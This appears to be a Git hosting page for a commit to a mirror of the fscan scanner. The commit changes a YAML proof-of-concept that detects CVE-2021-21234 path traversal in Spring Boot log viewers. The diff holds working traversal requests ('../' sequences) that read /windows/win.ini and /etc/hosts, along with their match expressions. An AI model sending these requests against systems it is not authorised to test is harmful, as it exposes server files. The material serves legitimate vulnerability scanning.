mirrors/fscan
1
0
Fork 0
mirror of https://github.com/shadow1ng/fscan.git synced 2025-07-13 21:02:44 +08:00
Code Issues Actions Packages Projects Releases Wiki Activity

Merge pull request #424 from adeljck/main

Browse Source 
Update springboot-cve-2021-21234.yml
This commit is contained in:
ZacharyZcR 2025-04-20 18:47:42 +08:00 committed by GitHub
commit d1d242e6a8
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 4 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
WebScan/pocs/springboot-cve-2021-21234.yml
View File

@ -3,19 +3,19 @@ groups:
spring1: spring1:
- method: GET - method: GET
path: /manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../ path: /manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../
expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support") && response.body.bcontains(b"fonts") expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support") && response.body.bcontains(b"fonts") && !response.body.bcontains(b"<html")
spring2: spring2:
- method: GET - method: GET
path: /log/view?filename=/windows/win.ini&base=../../../../../../../../../../ path: /log/view?filename=/windows/win.ini&base=../../../../../../../../../../
expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support") && response.body.bcontains(b"fonts") expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support") && response.body.bcontains(b"fonts") && !response.body.bcontains(b"<html")
spring3: spring3:
- method: GET - method: GET
path: /manage/log/view?filename=/etc/hosts&base=../../../../../../../../../../ path: /manage/log/view?filename=/etc/hosts&base=../../../../../../../../../../
expression: response.status == 200 && response.body.bcontains(b"127.0.0.1") && response.body.bcontains(b"localhost") expression: response.status == 200 && response.body.bcontains(b"127.0.0.1") && response.body.bcontains(b"localhost") && !response.body.bcontains(b"<html")
spring4: spring4:
- method: GET - method: GET
path: /log/view?filename=/etc/hosts&base=../../../../../../../../../../ path: /log/view?filename=/etc/hosts&base=../../../../../../../../../../
expression: response.status == 200 && response.body.bcontains(b"127.0.0.1") && response.body.bcontains(b"localhost") expression: response.status == 200 && response.body.bcontains(b"127.0.0.1") && response.body.bcontains(b"localhost") && !response.body.bcontains(b"<html")
detail: detail:
author: iak3ec(https://github.com/nu0l) author: iak3ec(https://github.com/nu0l)
links: links: